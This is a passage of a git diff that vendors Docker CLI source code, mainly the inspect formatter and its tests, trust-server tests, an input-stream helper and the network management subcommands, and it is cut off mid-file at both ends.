*testing.T) { + defer unsetENV() + indexInfo := ®istrytypes.IndexInfo{Name: "testserver"} + if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "http://notary-test.com:5000"); err != nil { + t.Fatal("Failed to set ENV variable") + } + _, err := trust.Server(indexInfo) + if err == nil { + t.Fatal("Expected error with invalid scheme") + } +} + +func TestOfficialTrustServer(t *testing.T) { + indexInfo := ®istrytypes.IndexInfo{Name: "testserver", Official: true} + output, err := trust.Server(indexInfo) + if err != nil || output != registry.NotaryServer { + t.Fatalf("Expected server to be %s, got %s", registry.NotaryServer, output) + } +} + +func TestNonOfficialTrustServer(t *testing.T) { + indexInfo := ®istrytypes.IndexInfo{Name: "testserver", Official: false} + output, err := trust.Server(indexInfo) + expectedStr := "https://" + indexInfo.Name + if err != nil || output != expectedStr { + t.Fatalf("Expected 
server to be %s, got %s", expectedStr, output) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/in.go b/vendor/github.com/docker/docker/cli/command/in.go new file mode 100644 index 0000000000..7204b7ad04 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/in.go @@ -0,0 +1,75 @@ +package command + +import ( + "errors" + "io" + "os" + "runtime" + + "github.com/docker/docker/pkg/term" +) + +// InStream is an input stream used by the DockerCli to read user input +type InStream struct { + in io.ReadCloser + fd uintptr + isTerminal bool + state *term.State +} + +func (i *InStream) Read(p []byte) (int, error) { + return i.in.Read(p) +} + +// Close implements the Closer interface +func (i *InStream) Close() error { + return i.in.Close() +} + +// FD returns the file descriptor number for this stream +func (i *InStream) FD() uintptr { + return i.fd +} + +// IsTerminal returns true if this stream is connected to a terminal +func (i *InStream) IsTerminal() bool { + return i.isTerminal +} + +// SetRawTerminal sets raw mode on the input terminal +func (i *InStream) SetRawTerminal() (err error) { + if os.Getenv("NORAW") != "" || !i.isTerminal { + return nil + } + i.state, err = term.SetRawTerminal(i.fd) + return err +} + +// RestoreTerminal restores normal mode to the terminal +func (i *InStream) RestoreTerminal() { + if i.state != nil { + term.RestoreTerminal(i.fd, i.state) + } +} + +// CheckTty checks if we are trying to attach to a container tty +// from a non-tty client input stream, and if so, returns an error. +func (i *InStream) CheckTty(attachStdin, ttyMode bool) error { + // In order to attach to a container tty, input stream for the client must + // be a tty itself: redirecting or piping the client standard input is + // incompatible with `docker run -t`, `docker exec -t` or `docker attach`. + if ttyMode && attachStdin && !i.isTerminal { + eText := "the input device is not a TTY" + if runtime.GOOS == "windows" { + return errors.New(eText + ". 
If you are using mintty, try prefixing the command with 'winpty'") + } + return errors.New(eText) + } + return nil +} + +// NewInStream returns a new InStream object from a ReadCloser +func NewInStream(in io.ReadCloser) *InStream { + fd, isTerminal := term.GetFdInfo(in) + return &InStream{in: in, fd: fd, isTerminal: isTerminal} +} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go new file mode 100644 index 0000000000..1d81643fb1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go @@ -0,0 +1,195 @@ +package inspect + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "text/template" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cli" + "github.com/docker/docker/utils/templates" +) + +// Inspector defines an interface to implement to process elements +type Inspector interface { + Inspect(typedElement interface{}, rawElement []byte) error + Flush() error +} + +// TemplateInspector uses a text template to inspect elements. +type TemplateInspector struct { + outputStream io.Writer + buffer *bytes.Buffer + tmpl *template.Template +} + +// NewTemplateInspector creates a new inspector with a template. +func NewTemplateInspector(outputStream io.Writer, tmpl *template.Template) Inspector { + return &TemplateInspector{ + outputStream: outputStream, + buffer: new(bytes.Buffer), + tmpl: tmpl, + } +} + +// NewTemplateInspectorFromString creates a new TemplateInspector from a string +// which is compiled into a template. 
+func NewTemplateInspectorFromString(out io.Writer, tmplStr string) (Inspector, error) { + if tmplStr == "" { + return NewIndentedInspector(out), nil + } + + tmpl, err := templates.Parse(tmplStr) + if err != nil { + return nil, fmt.Errorf("Template parsing error: %s", err) + } + return NewTemplateInspector(out, tmpl), nil +} + +// GetRefFunc is a function which used by Inspect to fetch an object from a +// reference +type GetRefFunc func(ref string) (interface{}, []byte, error) + +// Inspect fetches objects by reference using GetRefFunc and writes the json +// representation to the output writer. +func Inspect(out io.Writer, references []string, tmplStr string, getRef GetRefFunc) error { + inspector, err := NewTemplateInspectorFromString(out, tmplStr) + if err != nil { + return cli.StatusError{StatusCode: 64, Status: err.Error()} + } + + var inspectErr error + for _, ref := range references { + element, raw, err := getRef(ref) + if err != nil { + inspectErr = err + break + } + + if err := inspector.Inspect(element, raw); err != nil { + inspectErr = err + break + } + } + + if err := inspector.Flush(); err != nil { + logrus.Errorf("%s\n", err) + } + + if inspectErr != nil { + return cli.StatusError{StatusCode: 1, Status: inspectErr.Error()} + } + return nil +} + +// Inspect executes the inspect template. +// It decodes the raw element into a map if the initial execution fails. +// This allows docker cli to parse inspect structs injected with Swarm fields. +func (i *TemplateInspector) Inspect(typedElement interface{}, rawElement []byte) error { + buffer := new(bytes.Buffer) + if err := i.tmpl.Execute(buffer, typedElement); err != nil { + if rawElement == nil { + return fmt.Errorf("Template parsing error: %v", err) + } + return i.tryRawInspectFallback(rawElement) + } + i.buffer.Write(buffer.Bytes()) + i.buffer.WriteByte('\n') + return nil +} + +// tryRawInspectFallback executes the inspect template with a raw interface. 
+// This allows docker cli to parse inspect structs injected with Swarm fields. +func (i *TemplateInspector) tryRawInspectFallback(rawElement []byte) error { + var raw interface{} + buffer := new(bytes.Buffer) + rdr := bytes.NewReader(rawElement) + dec := json.NewDecoder(rdr) + + if rawErr := dec.Decode(&raw); rawErr != nil { + return fmt.Errorf("unable to read inspect data: %v", rawErr) + } + + tmplMissingKey := i.tmpl.Option("missingkey=error") + if rawErr := tmplMissingKey.Execute(buffer, raw); rawErr != nil { + return fmt.Errorf("Template parsing error: %v", rawErr) + } + + i.buffer.Write(buffer.Bytes()) + i.buffer.WriteByte('\n') + return nil +} + +// Flush writes the result of inspecting all elements into the output stream. +func (i *TemplateInspector) Flush() error { + if i.buffer.Len() == 0 { + _, err := io.WriteString(i.outputStream, "\n") + return err + } + _, err := io.Copy(i.outputStream, i.buffer) + return err +} + +// IndentedInspector uses a buffer to stop the indented representation of an element. +type IndentedInspector struct { + outputStream io.Writer + elements []interface{} + rawElements [][]byte +} + +// NewIndentedInspector generates a new IndentedInspector. +func NewIndentedInspector(outputStream io.Writer) Inspector { + return &IndentedInspector{ + outputStream: outputStream, + } +} + +// Inspect writes the raw element with an indented json format. +func (i *IndentedInspector) Inspect(typedElement interface{}, rawElement []byte) error { + if rawElement != nil { + i.rawElements = append(i.rawElements, rawElement) + } else { + i.elements = append(i.elements, typedElement) + } + return nil +} + +// Flush writes the result of inspecting all elements into the output stream. 
+func (i *IndentedInspector) Flush() error { + if len(i.elements) == 0 && len(i.rawElements) == 0 { + _, err := io.WriteString(i.outputStream, "[]\n") + return err + } + + var buffer io.Reader + if len(i.rawElements) > 0 { + bytesBuffer := new(bytes.Buffer) + bytesBuffer.WriteString("[") + for idx, r := range i.rawElements { + bytesBuffer.Write(r) + if idx < len(i.rawElements)-1 { + bytesBuffer.WriteString(",") + } + } + bytesBuffer.WriteString("]") + indented := new(bytes.Buffer) + if err := json.Indent(indented, bytesBuffer.Bytes(), "", " "); err != nil { + return err + } + buffer = indented + } else { + b, err := json.MarshalIndent(i.elements, "", " ") + if err != nil { + return err + } + buffer = bytes.NewReader(b) + } + + if _, err := io.Copy(i.outputStream, buffer); err != nil { + return err + } + _, err := io.WriteString(i.outputStream, "\n") + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go new file mode 100644 index 0000000000..1ce1593ab7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go @@ -0,0 +1,221 @@ +package inspect + +import ( + "bytes" + "strings" + "testing" + + "github.com/docker/docker/utils/templates" +) + +type testElement struct { + DNS string `json:"Dns"` +} + +func TestTemplateInspectorDefault(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.DNS}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "0.0.0.0\n" { + t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) + } +} + +func TestTemplateInspectorEmpty(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.DNS}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + + if err 
:= i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "\n" { + t.Fatalf("Expected `\\n`, got `%s`", b.String()) + } +} + +func TestTemplateInspectorTemplateError(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.Foo}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + + err = i.Inspect(testElement{"0.0.0.0"}, nil) + if err == nil { + t.Fatal("Expected error got nil") + } + + if !strings.HasPrefix(err.Error(), "Template parsing error") { + t.Fatalf("Expected template error, got %v", err) + } +} + +func TestTemplateInspectorRawFallback(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.Dns}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0"}`)); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "0.0.0.0\n" { + t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String()) + } +} + +func TestTemplateInspectorRawFallbackError(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.Dns}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + err = i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Foo": "0.0.0.0"}`)) + if err == nil { + t.Fatal("Expected error got nil") + } + + if !strings.HasPrefix(err.Error(), "Template parsing error") { + t.Fatalf("Expected template error, got %v", err) + } +} + +func TestTemplateInspectorMultiple(t *testing.T) { + b := new(bytes.Buffer) + tmpl, err := templates.Parse("{{.DNS}}") + if err != nil { + t.Fatal(err) + } + i := NewTemplateInspector(b, tmpl) + + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + if b.String() != "0.0.0.0\n1.1.1.1\n" { + t.Fatalf("Expected `0.0.0.0\\n1.1.1.1\\n`, got 
`%s`", b.String()) + } +} + +func TestIndentedInspectorDefault(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := `[ + { + "Dns": "0.0.0.0" + } +] +` + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} + +func TestIndentedInspectorMultiple(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := `[ + { + "Dns": "0.0.0.0" + }, + { + "Dns": "1.1.1.1" + } +] +` + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} + +func TestIndentedInspectorEmpty(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := "[]\n" + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} + +func TestIndentedInspectorRawElements(t *testing.T) { + b := new(bytes.Buffer) + i := NewIndentedInspector(b) + if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0", "Node": "0"}`)); err != nil { + t.Fatal(err) + } + + if err := i.Inspect(testElement{"1.1.1.1"}, []byte(`{"Dns": "1.1.1.1", "Node": "1"}`)); err != nil { + t.Fatal(err) + } + + if err := i.Flush(); err != nil { + t.Fatal(err) + } + + expected := `[ + { + "Dns": "0.0.0.0", + "Node": "0" + }, + { + "Dns": "1.1.1.1", + "Node": "1" + } +] +` + if b.String() != expected { + t.Fatalf("Expected `%s`, got `%s`", expected, b.String()) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/network/cmd.go b/vendor/github.com/docker/docker/cli/command/network/cmd.go new file mode 100644 
index 0000000000..ab8393cded --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/cmd.go @@ -0,0 +1,28 @@ +package network + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewNetworkCommand returns a cobra command for `network` subcommands +func NewNetworkCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "network", + Short: "Manage networks", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newConnectCommand(dockerCli), + newCreateCommand(dockerCli), + newDisconnectCommand(dockerCli), + newInspectCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/network/connect.go b/vendor/github.com/docker/docker/cli/command/network/connect.go new file mode 100644 index 0000000000..c4b676e5f1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/connect.go @@ -0,0 +1,64 @@ +package network + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type connectOptions struct { + network string + container string + ipaddress string + ipv6address string + links opts.ListOpts + aliases []string + linklocalips []string +} + +func newConnectCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := connectOptions{ + links: opts.NewListOpts(runconfigopts.ValidateLink), + } + + cmd := &cobra.Command{ + Use: "connect [OPTIONS] NETWORK CONTAINER", + Short: "Connect a container to a network", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.network = args[0] + opts.container = args[1] + return runConnect(dockerCli, 
opts) + }, + } + + flags := cmd.Flags() + flags.StringVar(&opts.ipaddress, "ip", "", "IP Address") + flags.StringVar(&opts.ipv6address, "ip6", "", "IPv6 Address") + flags.Var(&opts.links, "link", "Add link to another container") + flags.StringSliceVar(&opts.aliases, "alias", []string{}, "Add network-scoped alias for the container") + flags.StringSliceVar(&opts.linklocalips, "link-local-ip", []string{}, "Add a link-local address for the container") + + return cmd +} + +func runConnect(dockerCli *command.DockerCli, opts connectOptions) error { + client := dockerCli.Client() + + epConfig := &network.EndpointSettings{ + IPAMConfig: &network.EndpointIPAMConfig{ + IPv4Address: opts.ipaddress, + IPv6Address: opts.ipv6address, + LinkLocalIPs: opts.linklocalips, + }, + Links: opts.links.GetAll(), + Aliases: opts.aliases, + } + + return client.NetworkConnect(context.Background(), opts.network, opts.container, epConfig) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/create.go b/vendor/github.com/docker/docker/cli/command/network/create.go new file mode 100644 index 0000000000..abc494e1e0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/create.go @@ -0,0 +1,226 @@ +package network + +import ( + "fmt" + "net" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type createOptions struct { + name string + driver string + driverOpts opts.MapOpts + labels opts.ListOpts + internal bool + ipv6 bool + attachable bool + + ipamDriver string + ipamSubnet []string + ipamIPRange []string + ipamGateway []string + ipamAux opts.MapOpts + ipamOpt opts.MapOpts +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := createOptions{ + driverOpts: 
*opts.NewMapOpts(nil, nil), + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + ipamAux: *opts.NewMapOpts(nil, nil), + ipamOpt: *opts.NewMapOpts(nil, nil), + } + + cmd := &cobra.Command{ + Use: "create [OPTIONS] NETWORK", + Short: "Create a network", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.name = args[0] + return runCreate(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.driver, "driver", "d", "bridge", "Driver to manage the Network") + flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") + flags.Var(&opts.labels, "label", "Set metadata on a network") + flags.BoolVar(&opts.internal, "internal", false, "Restrict external access to the network") + flags.BoolVar(&opts.ipv6, "ipv6", false, "Enable IPv6 networking") + flags.BoolVar(&opts.attachable, "attachable", false, "Enable manual container attachment") + + flags.StringVar(&opts.ipamDriver, "ipam-driver", "default", "IP Address Management Driver") + flags.StringSliceVar(&opts.ipamSubnet, "subnet", []string{}, "Subnet in CIDR format that represents a network segment") + flags.StringSliceVar(&opts.ipamIPRange, "ip-range", []string{}, "Allocate container ip from a sub-range") + flags.StringSliceVar(&opts.ipamGateway, "gateway", []string{}, "IPv4 or IPv6 Gateway for the master subnet") + + flags.Var(&opts.ipamAux, "aux-address", "Auxiliary IPv4 or IPv6 addresses used by Network driver") + flags.Var(&opts.ipamOpt, "ipam-opt", "Set IPAM driver specific options") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts createOptions) error { + client := dockerCli.Client() + + ipamCfg, err := consolidateIpam(opts.ipamSubnet, opts.ipamIPRange, opts.ipamGateway, opts.ipamAux.GetAll()) + if err != nil { + return err + } + + // Construct network create request body + nc := types.NetworkCreate{ + Driver: opts.driver, + Options: opts.driverOpts.GetAll(), + IPAM: &network.IPAM{ + Driver: opts.ipamDriver, + Config: 
ipamCfg, + Options: opts.ipamOpt.GetAll(), + }, + CheckDuplicate: true, + Internal: opts.internal, + EnableIPv6: opts.ipv6, + Attachable: opts.attachable, + Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), + } + + resp, err := client.NetworkCreate(context.Background(), opts.name, nc) + if err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "%s\n", resp.ID) + return nil +} + +// Consolidates the ipam configuration as a group from different related configurations +// user can configure network with multiple non-overlapping subnets and hence it is +// possible to correlate the various related parameters and consolidate them. +// consoidateIpam consolidates subnets, ip-ranges, gateways and auxiliary addresses into +// structured ipam data. +func consolidateIpam(subnets, ranges, gateways []string, auxaddrs map[string]string) ([]network.IPAMConfig, error) { + if len(subnets) < len(ranges) || len(subnets) < len(gateways) { + return nil, fmt.Errorf("every ip-range or gateway must have a corresponding subnet") + } + iData := map[string]*network.IPAMConfig{} + + // Populate non-overlapping subnets into consolidation map + for _, s := range subnets { + for k := range iData { + ok1, err := subnetMatches(s, k) + if err != nil { + return nil, err + } + ok2, err := subnetMatches(k, s) + if err != nil { + return nil, err + } + if ok1 || ok2 { + return nil, fmt.Errorf("multiple overlapping subnet configuration is not supported") + } + } + iData[s] = &network.IPAMConfig{Subnet: s, AuxAddress: map[string]string{}} + } + + // Validate and add valid ip ranges + for _, r := range ranges { + match := false + for _, s := range subnets { + ok, err := subnetMatches(s, r) + if err != nil { + return nil, err + } + if !ok { + continue + } + if iData[s].IPRange != "" { + return nil, fmt.Errorf("cannot configure multiple ranges (%s, %s) on the same subnet (%s)", r, iData[s].IPRange, s) + } + d := iData[s] + d.IPRange = r + match = true + } + if !match { + return nil, 
fmt.Errorf("no matching subnet for range %s", r) + } + } + + // Validate and add valid gateways + for _, g := range gateways { + match := false + for _, s := range subnets { + ok, err := subnetMatches(s, g) + if err != nil { + return nil, err + } + if !ok { + continue + } + if iData[s].Gateway != "" { + return nil, fmt.Errorf("cannot configure multiple gateways (%s, %s) for the same subnet (%s)", g, iData[s].Gateway, s) + } + d := iData[s] + d.Gateway = g + match = true + } + if !match { + return nil, fmt.Errorf("no matching subnet for gateway %s", g) + } + } + + // Validate and add aux-addresses + for key, aa := range auxaddrs { + match := false + for _, s := range subnets { + ok, err := subnetMatches(s, aa) + if err != nil { + return nil, err + } + if !ok { + continue + } + iData[s].AuxAddress[key] = aa + match = true + } + if !match { + return nil, fmt.Errorf("no matching subnet for aux-address %s", aa) + } + } + + idl := []network.IPAMConfig{} + for _, v := range iData { + idl = append(idl, *v) + } + return idl, nil +} + +func subnetMatches(subnet, data string) (bool, error) { + var ( + ip net.IP + ) + + _, s, err := net.ParseCIDR(subnet) + if err != nil { + return false, fmt.Errorf("Invalid subnet %s : %v", s, err) + } + + if strings.Contains(data, "/") { + ip, _, err = net.ParseCIDR(data) + if err != nil { + return false, fmt.Errorf("Invalid cidr %s : %v", data, err) + } + } else { + ip = net.ParseIP(data) + } + + return s.Contains(ip), nil +} diff --git a/vendor/github.com/docker/docker/cli/command/network/disconnect.go b/vendor/github.com/docker/docker/cli/command/network/disconnect.go new file mode 100644 index 0000000000..c9d9c14a13 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/disconnect.go @@ -0,0 +1,41 @@ +package network + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type disconnectOptions struct { + network string + 
container string + force bool +} + +func newDisconnectCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := disconnectOptions{} + + cmd := &cobra.Command{ + Use: "disconnect [OPTIONS] NETWORK CONTAINER", + Short: "Disconnect a container from a network", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.network = args[0] + opts.container = args[1] + return runDisconnect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force the container to disconnect from a network") + + return cmd +} + +func runDisconnect(dockerCli *command.DockerCli, opts disconnectOptions) error { + client := dockerCli.Client() + + return client.NetworkDisconnect(context.Background(), opts.network, opts.container, opts.force) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/inspect.go b/vendor/github.com/docker/docker/cli/command/network/inspect.go new file mode 100644 index 0000000000..1a86855f71 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/inspect.go @@ -0,0 +1,45 @@ +package network + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + names []string +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] NETWORK [NETWORK...]", + Short: "Display detailed information on one or more networks", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.names = args + return runInspect(dockerCli, opts) + }, + } + + cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := 
dockerCli.Client() + + ctx := context.Background() + + getNetFunc := func(name string) (interface{}, []byte, error) { + return client.NetworkInspectWithRaw(ctx, name) + } + + return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getNetFunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/list.go b/vendor/github.com/docker/docker/cli/command/network/list.go new file mode 100644 index 0000000000..1a5d285103 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/list.go @@ -0,0 +1,76 @@ +package network + +import ( + "sort" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type byNetworkName []types.NetworkResource + +func (r byNetworkName) Len() int { return len(r) } +func (r byNetworkName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byNetworkName) Less(i, j int) bool { return r[i].Name < r[j].Name } + +type listOptions struct { + quiet bool + noTrunc bool + format string + filter opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List networks", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display network IDs") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate the output") + flags.StringVar(&opts.format, "format", "", "Pretty-print networks using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 
'driver=bridge')") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + options := types.NetworkListOptions{Filters: opts.filter.Value()} + networkResources, err := client.NetworkList(context.Background(), options) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().NetworksFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().NetworksFormat + } else { + format = formatter.TableFormatKey + } + } + + sort.Sort(byNetworkName(networkResources)) + + networksCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewNetworkFormat(format, opts.quiet), + Trunc: !opts.noTrunc, + } + return formatter.NetworkWrite(networksCtx, networkResources) +} diff --git a/vendor/github.com/docker/docker/cli/command/network/prune.go b/vendor/github.com/docker/docker/cli/command/network/prune.go new file mode 100644 index 0000000000..9f1979e6b5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/prune.go @@ -0,0 +1,73 @@ +package network + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool +} + +// NewPruneCommand returns a new cobra prune command for networks +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove all unused networks", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for 
confirmation") + + return cmd +} + +const warning = `WARNING! This will remove all networks not used by at least one container. +Are you sure you want to continue?` + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (output string, err error) { + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().NetworksPrune(context.Background(), filters.Args{}) + if err != nil { + return + } + + if len(report.NetworksDeleted) > 0 { + output = "Deleted Networks:\n" + for _, id := range report.NetworksDeleted { + output += id + "\n" + } + } + + return +} + +// RunPrune calls the Network Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { + output, err := runPrune(dockerCli, pruneOptions{force: true}) + return 0, output, err +} diff --git a/vendor/github.com/docker/docker/cli/command/network/remove.go b/vendor/github.com/docker/docker/cli/command/network/remove.go new file mode 100644 index 0000000000..2034b8709e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/network/remove.go @@ -0,0 +1,43 @@ +package network + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "rm NETWORK [NETWORK...]", + Aliases: []string{"remove"}, + Short: "Remove one or more networks", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args) + }, + } +} + +func runRemove(dockerCli *command.DockerCli, networks []string) error { + client := dockerCli.Client() + ctx := context.Background() + status := 0 + + for _, name := range networks { + if err := client.NetworkRemove(ctx, name); err != nil { + 
fmt.Fprintf(dockerCli.Err(), "%s\n", err) + status = 1 + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + + if status != 0 { + return cli.StatusError{StatusCode: status} + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/node/cmd.go b/vendor/github.com/docker/docker/cli/command/node/cmd.go new file mode 100644 index 0000000000..e71b9199ad --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/node/cmd.go @@ -0,0 +1,43 @@ +package node + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + apiclient "github.com/docker/docker/client" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +// NewNodeCommand returns a cobra command for `node` subcommands +func NewNodeCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "node", + Short: "Manage Swarm nodes", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newDemoteCommand(dockerCli), + newInspectCommand(dockerCli), + newListCommand(dockerCli), + newPromoteCommand(dockerCli), + newRemoveCommand(dockerCli), + 